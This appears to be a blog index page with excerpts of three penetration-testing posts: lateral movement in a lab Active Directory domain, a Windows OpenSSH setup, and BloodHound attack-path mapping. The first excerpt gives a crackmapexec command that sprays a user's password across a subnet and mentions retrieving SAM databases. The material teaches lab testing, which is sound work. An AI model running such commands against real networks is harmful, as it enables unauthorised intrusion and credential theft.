Attacking Active Directory

We will perform various Lateral movement and vertical movement . Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network. Lateral movement with crackmapexec: Power on kali, THEPUNISHER, Windows server 2022 . We will perform a pass the password attack using the password of the user fcastle across the entire domain. Make sure you have installed crackmapexec on your kali. Use the following command: crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 crackmapexec performs SMB enumeration on the targeted network using the creds. Then it uses pwn3d syntax to show that the machine has been affected using the username and password 2. Retrieving the SAM database from the windows devices across the domain using the following command: ...

November 24, 2025 · 4 min · 769 words · 0x-s0M3n4th

Misconfiguring SSH on Windows Server

OpenSSH is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand. OpenSSH for Windows has the following commands built in: ssh is the SSH client component that runs on the user’s local system sshd is the SSH server component that must be running on the system being managed remotely ssh-keygen generates, manages and converts authentication keys for SSH ssh-agent stores private keys used for public key authentication ssh-add adds private keys to the list allowed by the server ssh-keyscan aids in collecting the public SSH host keys from hosts sftp is the service that provides the Secure File Transfer Protocol, and runs over SSH scp is a file copy utility that runs on SSH Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following: ...

November 24, 2025 · 3 min · 619 words · 0x-s0M3n4th

BloodHound

BloodHound is an Active Directory data visualization application that helps penetration testers to efficiently identify the attack path to gain control over a Windows Active Directory domain and forest. In addition, it helps with identifying the misconfigurations and relationships that could be exploited by threat actors. Furthermore, BloodHound uses graph theory to reveal hidden relationships within an Active Directory environment, thus making it easier for penetration testers to visualize privilege escalation paths. Overall, the data in Active Directory must be collected from the organization using a collector such as BloodHound-Python, SharpHound, or AzureHound. Once the data has been collected, it has to be processed by BloodHound, which provides the attack path to domain takeover within an organization. ...

November 24, 2025 · 3 min · 508 words · 0x-s0M3n4th